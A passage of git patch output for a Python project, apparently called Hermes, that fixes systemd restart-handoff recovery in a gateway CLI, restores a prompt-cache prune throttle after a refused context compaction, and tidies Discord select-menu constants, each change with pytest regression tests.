if "restart" in cmd: - calls.append(("restart", cmd)) - return SimpleNamespace(stdout="", returncode=0) raise AssertionError(f"Unexpected systemctl call: {cmd}") monkeypatch.setattr(gateway_cli.subprocess, "run", fake_subprocess_run) @@ -756,8 +750,6 @@ class TestGatewaySystemServiceRouting: gateway_cli.systemd_restart() assert ("graceful", 654, 27.0) in calls - assert any(call[0] == "reset-failed" for call in calls) - assert any(call[0] == "restart" for call in calls) assert ("wait", False, 654) in calls out = capsys.readouterr().out.lower() assert "restarting gracefully" in out From 91fb175188d00a02ffaaccfdc495b577c42e0052 Mon Sep 17 00:00:00 2001 From: fangliquan Date: Sat, 22 Aug 2026 07:51:54 +0800 Subject: [PATCH 150/161] fix(gateway): preserve systemd handoff recovery --- gateway/run.py | 5 +- hermes_cli/gateway.py | 54 ++++++++++++++--- tests/gateway/test_gateway_shutdown.py | 21 +++++++ tests/hermes_cli/test_gateway_service.py | 75 ++++++++++++++++++++++++ 4 files changed, 146 insertions(+), 9 deletions(-) diff --git a/gateway/run.py b/gateway/run.py index f3cffd185a..50b2925d71 100644 --- a/gateway/run.py +++ b/gateway/run.py @@ -15218,8 +15218,9 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew # The service manager is the sole restart owner. Exit 75 # paired with ``RestartForceExitStatus=75`` asks systemd to # replace this process without a second helper racing the - # unit's stop/start job. launchd likewise treats the planned - # non-zero exit as restartable. + # unit's stop/start job. The generated launchd plist's + # unconditional ``KeepAlive`` likewise replaces the process + # after this planned exit. self._exit_code = GATEWAY_SERVICE_RESTART_EXIT_CODE self._exit_reason = self._exit_reason or "Gateway restart requested" diff --git a/hermes_cli/gateway.py b/hermes_cli/gateway.py index fed0e98c7f..66d574ecf3 100644 --- a/hermes_cli/gateway.py +++ b/hermes_cli/gateway.py @@ -1245,13 +1245,15 @@ def _wait_for_systemd_service_restart( *, system: bool = False, previous_pid: int | None = None, - timeout: float = 60.0, + timeout: float | None = None, ) -> bool: """Wait for the gateway service to become active after a restart handoff.""" import time svc = get_service_name() scope_label = _service_scope_label(system).capitalize() + if timeout is None: + timeout = _systemd_restart_wait_timeout(system=system) deadline = time.monotonic() + timeout printed_runtime_wait = False @@ -1308,6 +1310,25 @@ def _wait_for_systemd_service_restart( return False +def _systemd_restart_wait_timeout(system: bool = False) -> float: + """Cover systemd's relaunch delays before applying the runtime wait floor.""" + from gateway.shutdown_forensics import _parse_systemd_duration_to_us + + props = _read_systemd_unit_properties( + system=system, + properties=("RestartUSec", "TimeoutStartUSec"), + ) + supervisor_budget = 0.0 + for name in ("RestartUSec", "TimeoutStartUSec"): + raw = props.get(name, "") + duration_us = ( + int(raw) if raw.isdigit() else _parse_systemd_duration_to_us(raw) + ) + if duration_us is not None: + supervisor_budget += duration_us / 1_000_000 + return 60.0 + supervisor_budget + + def _systemd_unit_is_start_limited(props: dict[str, str]) -> bool: result = props.get("Result", "").lower() sub_state = props.get("SubState", "").lower() @@ -4124,13 +4145,32 @@ def systemd_restart(system: bool = False): # Exit 75 transfers restart ownership to systemd. Observe that # single replacement instead of issuing another restart that can # stop the process systemd has already brought up. - _wait_for_systemd_service_restart(system=system, previous_pid=pid) - return + if _wait_for_systemd_service_restart(system=system, previous_pid=pid): + return + if _systemd_service_is_start_limited(system=system): + return + + # A replacement may have started but not reached gateway runtime + # readiness before the wait expired. Never stop that generation. + props = _read_systemd_unit_properties(system=system) + replacement_pid = _systemd_main_pid_from_props(props) + if ( + props.get("ActiveState") in {"active", "activating", "reloading"} + or props.get("SubState") == "auto-restart" + or (replacement_pid is not None and replacement_pid != pid) + ): + return + + print( + "⚠ Systemd did not relaunch the gateway after its graceful exit; " + "forcing a service restart..." + ) + else: + print( + f"⚠ Graceful restart did not complete within {int(wait_budget)}s; " + "forcing a service restart..." + ) - print( - f"⚠ Graceful restart did not complete within {int(wait_budget)}s; " - "forcing a service restart..." - ) _run_systemctl( ["reset-failed", svc], system=system, diff --git a/tests/gateway/test_gateway_shutdown.py b/tests/gateway/test_gateway_shutdown.py index 3aaeb51696..eb7ae47090 100644 --- a/tests/gateway/test_gateway_shutdown.py +++ b/tests/gateway/test_gateway_shutdown.py @@ -1,4 +1,5 @@ import asyncio +import subprocess from unittest.mock import AsyncMock, MagicMock, patch import pytest @@ -147,6 +148,26 @@ async def test_gateway_stop_settles_completion_batch_before_adapter_disconnect() assert runner._completion_notification_batch_flush_tasks == set() +@pytest.mark.asyncio +async def test_planned_service_exit_issues_no_restart_of_its_own(monkeypatch): + runner, adapter = make_restart_runner() + adapter.disconnect = AsyncMock() + runner._restart_requested = True + runner._restart_via_service = True + monkeypatch.setattr( + subprocess, + "Popen", + lambda *args, **kwargs: pytest.fail( + f"planned service exit must not spawn a restart helper: {args}" + ), + ) + + with patch("gateway.status.remove_pid_file"), patch("gateway.status.write_runtime_status"): + await runner.stop() + + assert runner._exit_code == GATEWAY_SERVICE_RESTART_EXIT_CODE + + @pytest.mark.asyncio async def test_in_chat_restart_skips_home_shutdown_even_with_active_session(): runner, adapter = make_restart_runner() diff --git a/tests/hermes_cli/test_gateway_service.py b/tests/hermes_cli/test_gateway_service.py index 02e4566e48..1e38d90786 100644 --- a/tests/hermes_cli/test_gateway_service.py +++ b/tests/hermes_cli/test_gateway_service.py @@ -756,6 +756,81 @@ class TestGatewaySystemServiceRouting: assert "21627" not in out # must use the mocked budget, not live defaults assert "27" in out + def test_systemd_restart_forces_recovery_only_when_handoff_has_no_replacement( + self, monkeypatch, capsys + ): + calls = [] + + monkeypatch.setattr(gateway_cli, "_select_systemd_scope", lambda system=False: False) + monkeypatch.setattr(gateway_cli, "_require_service_installed", lambda action, system=False: None) + monkeypatch.setattr(gateway_cli, "_preflight_user_systemd", lambda **kwargs: None) + monkeypatch.setattr(gateway_cli, "refresh_systemd_unit_if_needed", lambda system=False: None) + monkeypatch.setattr(gateway_cli, "_get_restart_exit_wait_budget", lambda: 27.0) + monkeypatch.setattr("gateway.status.get_running_pid", lambda: 654) + monkeypatch.setattr(gateway_cli, "_graceful_restart_via_sigusr1", lambda pid, timeout: True) + waits = iter((False, True)) + monkeypatch.setattr( + gateway_cli, + "_wait_for_systemd_service_restart", + lambda system=False, previous_pid=None: next(waits), + ) + monkeypatch.setattr(gateway_cli, "_systemd_service_is_start_limited", lambda system=False: False) + monkeypatch.setattr( + gateway_cli, + "_read_systemd_unit_properties", + lambda system=False, properties=None: {"ActiveState": "inactive", "MainPID": "0"}, + ) + monkeypatch.setattr( + gateway_cli, + "_run_systemctl", + lambda args, **kwargs: calls.append((args, kwargs)) + or SimpleNamespace(returncode=0, stdout="", stderr=""), + ) + + gateway_cli.systemd_restart() + + assert [call[0][0] for call in calls] == ["reset-failed", "restart"] + assert "did not relaunch" in capsys.readouterr().out + + def test_systemd_restart_does_not_force_an_unready_replacement(self, monkeypatch): + calls = [] + + monkeypatch.setattr(gateway_cli, "_select_systemd_scope", lambda system=False: False) + monkeypatch.setattr(gateway_cli, "_require_service_installed", lambda action, system=False: None) + monkeypatch.setattr(gateway_cli, "_preflight_user_systemd", lambda **kwargs: None) + monkeypatch.setattr(gateway_cli, "refresh_systemd_unit_if_needed", lambda system=False: None) + monkeypatch.setattr(gateway_cli, "_get_restart_exit_wait_budget", lambda: 27.0) + monkeypatch.setattr("gateway.status.get_running_pid", lambda: 654) + monkeypatch.setattr(gateway_cli, "_graceful_restart_via_sigusr1", lambda pid, timeout: True) + monkeypatch.setattr( + gateway_cli, + "_wait_for_systemd_service_restart", + lambda system=False, previous_pid=None: False, + ) + monkeypatch.setattr(gateway_cli, "_systemd_service_is_start_limited", lambda system=False: False) + monkeypatch.setattr( + gateway_cli, + "_read_systemd_unit_properties", + lambda system=False, properties=None: {"ActiveState": "active", "MainPID": "777"}, + ) + monkeypatch.setattr(gateway_cli, "_run_systemctl", lambda args, **kwargs: calls.append(args)) + + gateway_cli.systemd_restart() + + assert calls == [] + + def test_systemd_restart_wait_timeout_includes_supervisor_budgets(self, monkeypatch): + monkeypatch.setattr( + gateway_cli, + "_read_systemd_unit_properties", + lambda system=False, properties=None: { + "RestartUSec": "5s", + "TimeoutStartUSec": "1min 30s", + }, + ) + + assert gateway_cli._systemd_restart_wait_timeout() == 155.0 + From 83b09ebd0a11ad591a7e85fad02b89208b06f806 Mon Sep 17 00:00:00 2001 From: fangliquan Date: Sat, 22 Aug 2026 07:56:47 +0800 Subject: [PATCH 151/161] fix(gateway): make handoff recovery idempotent --- hermes_cli/gateway.py | 12 +++++++-- tests/hermes_cli/test_gateway_service.py | 31 +++++++++++++++++++++++- 2 files changed, 40 insertions(+), 3 deletions(-) diff --git a/hermes_cli/gateway.py b/hermes_cli/gateway.py index 66d574ecf3..316a1457b8 100644 --- a/hermes_cli/gateway.py +++ b/hermes_cli/gateway.py @@ -4141,6 +4141,7 @@ def systemd_restart(system: bool = False): f"⏳ {scope_label} service restarting gracefully (PID {pid}) — " f"waiting up to {wait_budget:.0f}s for in-flight turns + drain..." ) + service_action = "restart" if _graceful_restart_via_sigusr1(pid, wait_budget): # Exit 75 transfers restart ownership to systemd. Observe that # single replacement instead of issuing another restart that can @@ -4153,6 +4154,8 @@ def systemd_restart(system: bool = False): # A replacement may have started but not reached gateway runtime # readiness before the wait expired. Never stop that generation. props = _read_systemd_unit_properties(system=system) + if not props: + return replacement_pid = _systemd_main_pid_from_props(props) if ( props.get("ActiveState") in {"active", "activating", "reloading"} @@ -4163,8 +4166,11 @@ def systemd_restart(system: bool = False): print( "⚠ Systemd did not relaunch the gateway after its graceful exit; " - "forcing a service restart..." + "starting the inactive service..." ) + # ``start`` is intentionally idempotent: if a replacement appears + # after the snapshot, this must not stop that new generation. + service_action = "start" else: print( f"⚠ Graceful restart did not complete within {int(wait_budget)}s; " @@ -4178,7 +4184,9 @@ def systemd_restart(system: bool = False): timeout=30, ) try: - _run_systemctl(["restart", svc], system=system, check=True, timeout=90) + _run_systemctl( + [service_action, svc], system=system, check=True, timeout=90 + ) except subprocess.CalledProcessError as exc: if _systemd_error_indicates_start_limit( exc diff --git a/tests/hermes_cli/test_gateway_service.py b/tests/hermes_cli/test_gateway_service.py index 1e38d90786..35ea93cde2 100644 --- a/tests/hermes_cli/test_gateway_service.py +++ b/tests/hermes_cli/test_gateway_service.py @@ -789,7 +789,7 @@ class TestGatewaySystemServiceRouting: gateway_cli.systemd_restart() - assert [call[0][0] for call in calls] == ["reset-failed", "restart"] + assert [call[0][0] for call in calls] == ["reset-failed", "start"] assert "did not relaunch" in capsys.readouterr().out def test_systemd_restart_does_not_force_an_unready_replacement(self, monkeypatch): @@ -819,6 +819,35 @@ class TestGatewaySystemServiceRouting: assert calls == [] + def test_systemd_restart_does_not_recover_when_handoff_state_is_unknown( + self, monkeypatch + ): + calls = [] + + monkeypatch.setattr(gateway_cli, "_select_systemd_scope", lambda system=False: False) + monkeypatch.setattr(gateway_cli, "_require_service_installed", lambda action, system=False: None) + monkeypatch.setattr(gateway_cli, "_preflight_user_systemd", lambda **kwargs: None) + monkeypatch.setattr(gateway_cli, "refresh_systemd_unit_if_needed", lambda system=False: None) + monkeypatch.setattr(gateway_cli, "_get_restart_exit_wait_budget", lambda: 27.0) + monkeypatch.setattr("gateway.status.get_running_pid", lambda: 654) + monkeypatch.setattr(gateway_cli, "_graceful_restart_via_sigusr1", lambda pid, timeout: True) + monkeypatch.setattr( + gateway_cli, + "_wait_for_systemd_service_restart", + lambda system=False, previous_pid=None: False, + ) + monkeypatch.setattr(gateway_cli, "_systemd_service_is_start_limited", lambda system=False: False) + monkeypatch.setattr( + gateway_cli, + "_read_systemd_unit_properties", + lambda system=False, properties=None: {}, + ) + monkeypatch.setattr(gateway_cli, "_run_systemctl", lambda args, **kwargs: calls.append(args)) + + gateway_cli.systemd_restart() + + assert calls == [] + def test_systemd_restart_wait_timeout_includes_supervisor_budgets(self, monkeypatch): monkeypatch.setattr( gateway_cli, From 596bfc557fd0018d4a05e8b4fcfdb51ca644e060 Mon Sep 17 00:00:00 2001 From: fangliquan Date: Sat, 22 Aug 2026 08:04:29 +0800 Subject: [PATCH 152/161] fix(gateway): distinguish failed systemd replacements --- hermes_cli/gateway.py | 18 ++++++++++- tests/hermes_cli/test_gateway_service.py | 39 +++++++++++++++++++++--- 2 files changed, 52 insertions(+), 5 deletions(-) diff --git a/hermes_cli/gateway.py b/hermes_cli/gateway.py index 316a1457b8..7f1a45f5dc 100644 --- a/hermes_cli/gateway.py +++ b/hermes_cli/gateway.py @@ -1246,6 +1246,7 @@ def _wait_for_systemd_service_restart( system: bool = False, previous_pid: int | None = None, timeout: float | None = None, + replacement_observed: list[bool] | None = None, ) -> bool: """Wait for the gateway service to become active after a restart handoff.""" import time @@ -1270,6 +1271,14 @@ def _wait_for_systemd_service_restart( new_pid = None if not new_pid: new_pid = _systemd_main_pid_from_props(props) + if ( + new_pid + and previous_pid is not None + and new_pid != previous_pid + and replacement_observed is not None + and not replacement_observed + ): + replacement_observed.append(True) if active_state == "active": if new_pid and (previous_pid is None or new_pid != previous_pid): @@ -4146,7 +4155,14 @@ def systemd_restart(system: bool = False): # Exit 75 transfers restart ownership to systemd. Observe that # single replacement instead of issuing another restart that can # stop the process systemd has already brought up. - if _wait_for_systemd_service_restart(system=system, previous_pid=pid): + replacement_observed: list[bool] = [] + if _wait_for_systemd_service_restart( + system=system, + previous_pid=pid, + replacement_observed=replacement_observed, + ): + return + if replacement_observed: return if _systemd_service_is_start_limited(system=system): return diff --git a/tests/hermes_cli/test_gateway_service.py b/tests/hermes_cli/test_gateway_service.py index 35ea93cde2..f1593c4b8a 100644 --- a/tests/hermes_cli/test_gateway_service.py +++ b/tests/hermes_cli/test_gateway_service.py @@ -744,7 +744,10 @@ class TestGatewaySystemServiceRouting: monkeypatch.setattr( gateway_cli, "_wait_for_systemd_service_restart", - lambda system=False, previous_pid=None: calls.append(("wait", system, previous_pid)) or True, + lambda system=False, previous_pid=None, replacement_observed=None: calls.append( + ("wait", system, previous_pid) + ) + or True, ) gateway_cli.systemd_restart() @@ -772,7 +775,7 @@ class TestGatewaySystemServiceRouting: monkeypatch.setattr( gateway_cli, "_wait_for_systemd_service_restart", - lambda system=False, previous_pid=None: next(waits), + lambda system=False, previous_pid=None, replacement_observed=None: next(waits), ) monkeypatch.setattr(gateway_cli, "_systemd_service_is_start_limited", lambda system=False: False) monkeypatch.setattr( @@ -805,7 +808,7 @@ class TestGatewaySystemServiceRouting: monkeypatch.setattr( gateway_cli, "_wait_for_systemd_service_restart", - lambda system=False, previous_pid=None: False, + lambda system=False, previous_pid=None, replacement_observed=None: False, ) monkeypatch.setattr(gateway_cli, "_systemd_service_is_start_limited", lambda system=False: False) monkeypatch.setattr( @@ -819,6 +822,34 @@ class TestGatewaySystemServiceRouting: assert calls == [] + def test_systemd_restart_does_not_recover_a_failed_replacement(self, monkeypatch): + calls = [] + + monkeypatch.setattr(gateway_cli, "_select_systemd_scope", lambda system=False: False) + monkeypatch.setattr(gateway_cli, "_require_service_installed", lambda action, system=False: None) + monkeypatch.setattr(gateway_cli, "_preflight_user_systemd", lambda **kwargs: None) + monkeypatch.setattr(gateway_cli, "refresh_systemd_unit_if_needed", lambda system=False: None) + monkeypatch.setattr(gateway_cli, "_get_restart_exit_wait_budget", lambda: 27.0) + monkeypatch.setattr("gateway.status.get_running_pid", lambda: 654) + monkeypatch.setattr(gateway_cli, "_graceful_restart_via_sigusr1", lambda pid, timeout: True) + + def failed_replacement_wait( + system=False, previous_pid=None, replacement_observed=None + ): + replacement_observed.append(True) + return False + + monkeypatch.setattr( + gateway_cli, + "_wait_for_systemd_service_restart", + failed_replacement_wait, + ) + monkeypatch.setattr(gateway_cli, "_run_systemctl", lambda args, **kwargs: calls.append(args)) + + gateway_cli.systemd_restart() + + assert calls == [] + def test_systemd_restart_does_not_recover_when_handoff_state_is_unknown( self, monkeypatch ): @@ -834,7 +865,7 @@ class TestGatewaySystemServiceRouting: monkeypatch.setattr( gateway_cli, "_wait_for_systemd_service_restart", - lambda system=False, previous_pid=None: False, + lambda system=False, previous_pid=None, replacement_observed=None: False, ) monkeypatch.setattr(gateway_cli, "_systemd_service_is_start_limited", lambda system=False: False) monkeypatch.setattr( From a4f16e3fefdc537ef2e029006048444b9531839a Mon Sep 17 00:00:00 2001 From: fangliquan Date: Sat, 22 Aug 2026 08:12:04 +0800 Subject: [PATCH 153/161] fix(gateway): retain failed replacement evidence --- hermes_cli/gateway.py | 17 ++++++++++---- tests/hermes_cli/test_gateway_service.py | 29 ++++++++++++++++++++++++ 2 files changed, 42 insertions(+), 4 deletions(-) diff --git a/hermes_cli/gateway.py b/hermes_cli/gateway.py index 7f1a45f5dc..0ae4a523fb 100644 --- a/hermes_cli/gateway.py +++ b/hermes_cli/gateway.py @@ -1271,18 +1271,27 @@ def _wait_for_systemd_service_restart( new_pid = None if not new_pid: new_pid = _systemd_main_pid_from_props(props) + + runtime_state = _read_gateway_runtime_status() + try: + runtime_pid = int((runtime_state or {}).get("pid", 0) or 0) + except (TypeError, ValueError): + runtime_pid = 0 if ( - new_pid - and previous_pid is not None - and new_pid != previous_pid + previous_pid is not None and replacement_observed is not None and not replacement_observed + and any( + candidate_pid > 0 and candidate_pid != previous_pid + for candidate_pid in (new_pid or 0, runtime_pid) + ) ): replacement_observed.append(True) if active_state == "active": if new_pid and (previous_pid is None or new_pid != previous_pid): - runtime_state = _gateway_runtime_status_for_pid(new_pid) + if runtime_pid != new_pid: + runtime_state = _gateway_runtime_status_for_pid(new_pid) gateway_state = (runtime_state or {}).get("gateway_state") if gateway_state == "running": print(f"✓ {scope_label} service restarted (PID {new_pid})") diff --git a/tests/hermes_cli/test_gateway_service.py b/tests/hermes_cli/test_gateway_service.py index f1593c4b8a..99f0099f42 100644 --- a/tests/hermes_cli/test_gateway_service.py +++ b/tests/hermes_cli/test_gateway_service.py @@ -891,6 +891,35 @@ class TestGatewaySystemServiceRouting: assert gateway_cli._systemd_restart_wait_timeout() == 155.0 + def test_wait_records_a_short_lived_failed_replacement(self, monkeypatch): + ticks = iter((0.0, 0.0, 2.0)) + monkeypatch.setattr(gateway_cli.time, "monotonic", lambda: next(ticks)) + monkeypatch.setattr(gateway_cli.time, "sleep", lambda _seconds: None) + monkeypatch.setattr( + gateway_cli, + "_read_systemd_unit_properties", + lambda system=False, properties=None: { + "ActiveState": "failed", + "MainPID": "0", + }, + ) + monkeypatch.setattr("gateway.status.get_running_pid", lambda: None) + monkeypatch.setattr( + gateway_cli, + "_read_gateway_runtime_status", + lambda: {"pid": 777, "gateway_state": "startup_failed"}, + ) + replacement_observed = [] + + result = gateway_cli._wait_for_systemd_service_restart( + previous_pid=654, + timeout=1.0, + replacement_observed=replacement_observed, + ) + + assert result is False + assert replacement_observed == [True] + From 4c76ec81a97df299e7db493489185d55d3f292d4 Mon Sep 17 00:00:00 2001 From: kshitijk4poor Date: Sat, 22 Aug 2026 15:38:16 +0530 Subject: [PATCH 154/161] fix(compression): restore the prune runway when a would-grow refusal keeps the transcript MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit compress()'s successful tail zeroes _proactive_prune_rearm_tokens in memory — correct for a committed compaction, whose boundary already broke the prompt-cache prefix. But compress_context's anti-growth guard can then REFUSE the result and keep the original transcript, whose cached prefix is intact. The refusal returned with the in-memory runway still at 0 while the durable model_config copy kept the old value, so: - the next eligible iteration's proactive prune fired without the regrowth interval #79640 introduced — an immediate, unthrottled cache-breaking rewrite (#91830's bug class), and - memory and disk disagreed until a restart silently re-armed the throttle from the stale durable row. The refusal branch now restores the runway from the attempt snapshot — the same targeted restore the rotation-failure rollback already performs. Sibling non-commit branches audited: aborted (returns before the tail zero), no-progress (tail zero only runs after a real boundary rewrite, which no-progress by definition lacks), empty-transcript (built-in tail never returns []), fence-denied (full snapshot restore already covers the runway), in-place DB failure (in-memory transcript keeps the compacted form, so the zeroed runway is consistent with it). Fixes the reachable half of the structural asymmetry flagged in #91830. --- agent/conversation_compression.py | 19 +++++ tests/agent/test_would_grow_refusal_runway.py | 82 +++++++++++++++++++ 2 files changed, 101 insertions(+) create mode 100644 tests/agent/test_would_grow_refusal_runway.py diff --git a/agent/conversation_compression.py b/agent/conversation_compression.py index a2b2643bf3..3d4b220d4d 100644 --- a/agent/conversation_compression.py +++ b/agent/conversation_compression.py @@ -3460,6 +3460,25 @@ def compress_context( "could not record rejected-compaction strike", exc_info=True, ) + # Restore ONLY the prune runway (same rationale as the + # rotation-failure rollback below): compress()'s successful + # tail already zeroed _proactive_prune_rearm_tokens in + # memory, but this refusal keeps the ORIGINAL transcript — + # whose cached prefix is intact. Leaving the runway at 0 + # disarms the #79640 throttle, so the very next iteration's + # proactive prune rewrites history and breaks the prompt + # cache without the required regrowth interval (#91830). + # The durable copy was never cleared (that clear only rides + # the archive_and_compact / child-row commit that never + # ran), so restoring the snapshot re-aligns memory with + # disk. When compress() aborted before its tail, snapshot + # and current value are identical and this is a no-op. + if "_proactive_prune_rearm_tokens" in _compressor_attempt_snapshot: + agent.context_compressor._proactive_prune_rearm_tokens = ( + _compressor_attempt_snapshot[ + "_proactive_prune_rearm_tokens" + ] + ) _release_lock() return messages, _existing_sp diff --git a/tests/agent/test_would_grow_refusal_runway.py b/tests/agent/test_would_grow_refusal_runway.py new file mode 100644 index 0000000000..480577f42f --- /dev/null +++ b/tests/agent/test_would_grow_refusal_runway.py @@ -0,0 +1,82 @@ +"""Regression: a would-grow refusal must not disarm the proactive-prune runway. + +#91830 follow-up. ``ContextCompressor.compress()`` zeroes +``_proactive_prune_rearm_tokens`` on its successful tail — correct for a +COMMITTED compaction (the boundary already broke the prompt-cache prefix, so +the throttle restarts from the new baseline). But ``compress_context``'s +anti-growth guard can then REFUSE the result and keep the original +transcript, whose cached prefix is intact. Before the fix, that refusal +returned with the in-memory runway still at 0 while the durable +``model_config`` copy kept the old value: + +- the very next eligible iteration's proactive prune fired without the + regrowth interval #79640 introduced — an immediate, unthrottled + cache-breaking rewrite of history that was still byte-identical to what + the provider had cached, and +- memory and disk disagreed until the next restart silently re-armed the + throttle from the stale durable row. + +The refusal branch now restores the runway from the attempt snapshot, the +same targeted restore the rotation-failure rollback already performed. +""" + +from __future__ import annotations + +import os +from pathlib import Path +from unittest.mock import patch + +from hermes_state import SessionDB + + +def _build_agent(db: SessionDB, session_id: str): + with patch.dict(os.environ, {"OPENROUTER_API_KEY": "test-key"}): + from run_agent import AIAgent + + agent = AIAgent( + api_key="test-key", + base_url="https://openrouter.ai/api/v1", + model="test/model", + quiet_mode=True, + session_db=db, + session_id=session_id, + skip_context_files=True, + skip_memory=True, + ) + # Skip the one-time aux-model feasibility probe (may hit the network). + agent._compression_feasibility_checked = True + return agent + + +def test_would_grow_refusal_restores_prune_runway(tmp_path: Path) -> None: + db = SessionDB(db_path=tmp_path / "state.db") + session_id = "WOULD_GROW_RUNWAY" + db.create_session(session_id, source="test") + + agent = _build_agent(db, session_id) + compressor = agent.context_compressor + armed_runway = 250_000 + compressor._proactive_prune_rearm_tokens = armed_runway + + messages = [{"role": "user", "content": f"m{i} " + "x" * 200} for i in range(10)] + + def _growing_compress(msgs, **_kw): + # Mirror the real compress() tail: it zeroes the in-memory runway + # before returning — then return a transcript LARGER than the input + # so the caller's anti-growth guard refuses the commit. + compressor._proactive_prune_rearm_tokens = 0 + return list(msgs) + [ + {"role": "assistant", "content": "GROWN " * 20_000}, + ] + + with patch.object(type(compressor), "compress", side_effect=_growing_compress): + returned, _sp = agent._compress_context(messages, "sys", approx_tokens=120_000) + + # Refusal contract: original transcript kept, refusal flagged. + assert returned == messages + assert compressor._last_compress_refused_would_grow is True + # The runway must survive the refusal — memory re-aligned with the + # (never-cleared) durable copy, keeping the #79640 throttle armed. + assert compressor._proactive_prune_rearm_tokens == armed_runway + # And the compression lock must not leak. + assert db.get_compression_lock_holder(session_id) is None From 4a6b362178ab2445e8310cc55a49fa2816b7aad0 Mon Sep 17 00:00:00 2001 From: kshitijk4poor Date: Sat, 22 Aug 2026 15:52:55 +0530 Subject: [PATCH 155/161] review follow-up: trim overreaching comment sentence, pin durable-copy assertion MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Drop the 'aborted before its tail' no-op sentence: early aborts are intercepted by the aborted/no-progress branches and never reach the would-grow check, so the framing overstated its relevance (2c finding). - Test now also asserts the durable model_config copy still holds the armed runway after the refusal — locking in the memory==disk half of the contract, not just the in-memory value. --- agent/conversation_compression.py | 3 +-- tests/agent/test_would_grow_refusal_runway.py | 12 ++++++++++++ 2 files changed, 13 insertions(+), 2 deletions(-) diff --git a/agent/conversation_compression.py b/agent/conversation_compression.py index 3d4b220d4d..90f3b5e879 100644 --- a/agent/conversation_compression.py +++ b/agent/conversation_compression.py @@ -3471,8 +3471,7 @@ def compress_context( # The durable copy was never cleared (that clear only rides # the archive_and_compact / child-row commit that never # ran), so restoring the snapshot re-aligns memory with - # disk. When compress() aborted before its tail, snapshot - # and current value are identical and this is a no-op. + # disk. if "_proactive_prune_rearm_tokens" in _compressor_attempt_snapshot: agent.context_compressor._proactive_prune_rearm_tokens = ( _compressor_attempt_snapshot[ diff --git a/tests/agent/test_would_grow_refusal_runway.py b/tests/agent/test_would_grow_refusal_runway.py index 480577f42f..58bdf9e0c8 100644 --- a/tests/agent/test_would_grow_refusal_runway.py +++ b/tests/agent/test_would_grow_refusal_runway.py @@ -57,6 +57,12 @@ def test_would_grow_refusal_restores_prune_runway(tmp_path: Path) -> None: compressor = agent.context_compressor armed_runway = 250_000 compressor._proactive_prune_rearm_tokens = armed_runway + # Arm the durable copy too, exactly as a committed prune would have + # (prune_tool_results_only persists it via archive_and_compact's + # model_config_patch) — the refusal must leave it untouched. + db.patch_session_model_config( + session_id, {"_proactive_prune_rearm_tokens": armed_runway} + ) messages = [{"role": "user", "content": f"m{i} " + "x" * 200} for i in range(10)] @@ -78,5 +84,11 @@ def test_would_grow_refusal_restores_prune_runway(tmp_path: Path) -> None: # The runway must survive the refusal — memory re-aligned with the # (never-cleared) durable copy, keeping the #79640 throttle armed. assert compressor._proactive_prune_rearm_tokens == armed_runway + assert ( + db.get_session_model_config_value( + session_id, "_proactive_prune_rearm_tokens", 0 + ) + == armed_runway + ) # And the compression lock must not leak. assert db.get_compression_lock_holder(session_id) is None From c925cc8eb868708c1799c9f7e40345f07a133e51 Mon Sep 17 00:00:00 2001 From: kshitijk4poor Date: Sat, 22 Aug 2026 15:01:48 +0530 Subject: [PATCH 156/161] refactor(discord): derive model-select capacity from the row/option constants Final-review follow-up: replace the bare 75 in the shown-count with _DISCORD_MODEL_SELECT_CAPACITY so it can never desync from what the partitioned menus actually render. --- plugins/platforms/discord/adapter.py | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/plugins/platforms/discord/adapter.py b/plugins/platforms/discord/adapter.py index 818827e889..0ebc2e3cf8 100644 --- a/plugins/platforms/discord/adapter.py +++ b/plugins/platforms/discord/adapter.py @@ -87,6 +87,10 @@ _DISCORD_SELECT_FIELD_LIMIT = 100 # Discord caps a single select menu at 25 options; a View holds at most 5 rows. _DISCORD_SELECT_MAX_OPTIONS = 25 _DISCORD_SELECT_MAX_ROWS = 5 +# Model-select capacity: keep 2 rows for Back/Cancel, fill the rest with selects. +_DISCORD_MODEL_SELECT_CAPACITY = ( + _DISCORD_SELECT_MAX_ROWS - 2 +) * _DISCORD_SELECT_MAX_OPTIONS _DISCORD_BUTTON_LABEL_LIMIT = 80 _DISCORD_ELLIPSIS = "\u2026" _DISCORD_NONCONVERSATIONAL_METADATA_KEYS = frozenset({ @@ -9355,7 +9359,11 @@ def _define_discord_view_classes() -> None: # select menus (up to 3×25 = 75); the old code hard-capped at 25 # and silently dropped the tail (e.g. Nous `:free` Portal picks). total = provider.get("total_models", 0) if provider else 0 - shown = min(len(provider.get("models", [])), 75) if provider else 0 + shown = ( + min(len(provider.get("models", [])), _DISCORD_MODEL_SELECT_CAPACITY) + if provider + else 0 + ) extra = f"\n*{total - shown} more available — type `/model ` directly*" if total > shown else "" await interaction.response.edit_message( From 9154421b11ed3f85583298e4a1e910c2a5a5cec0 Mon Sep 17 00:00:00 2001 From: kshitijk4poor Date: Sat, 22 Aug 2026 15:08:17 +0530 Subject: [PATCH 157/161] refactor(discord): use _DISCORD_SELECT_MAX_OPTIONS in ChoicePickerView Final-review follow-up: swap the bare [:25] slice for the new constant. Behavior-identical (same 25); removes the last bare option-cap literal in the file. ChoicePickerView feeds finite /reasoning and /fast choice lists, so no functional change. --- plugins/platforms/discord/adapter.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/plugins/platforms/discord/adapter.py b/plugins/platforms/discord/adapter.py index 0ebc2e3cf8..2ea115b1fb 100644 --- a/plugins/platforms/discord/adapter.py +++ b/plugins/platforms/discord/adapter.py @@ -9537,7 +9537,7 @@ def _define_discord_view_classes() -> None: allowed_role_ids: Optional[set] = None, ): super().__init__(timeout=120) - self.choices = list(choices)[:25] # Discord select cap + self.choices = list(choices)[:_DISCORD_SELECT_MAX_OPTIONS] self.on_choice_selected = on_choice_selected self.allowed_user_ids = allowed_user_ids self.allowed_role_ids = allowed_role_ids or set() From 684e95a0012b12a1405d126bdba1141fa58ef43d Mon Sep 17 00:00:00 2001 From: Kshitij Kapoor Date: Sat, 22 Aug 2026 16:26:51 +0530 Subject: [PATCH 158/161] fix(gateway): claim ledger rows and clear resume_pending inline before the abandonable boot-send task MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Post-merge follow-up to #92173. The claim + resume-clear lived inside the boot-send task AFTER the restart notification — itself 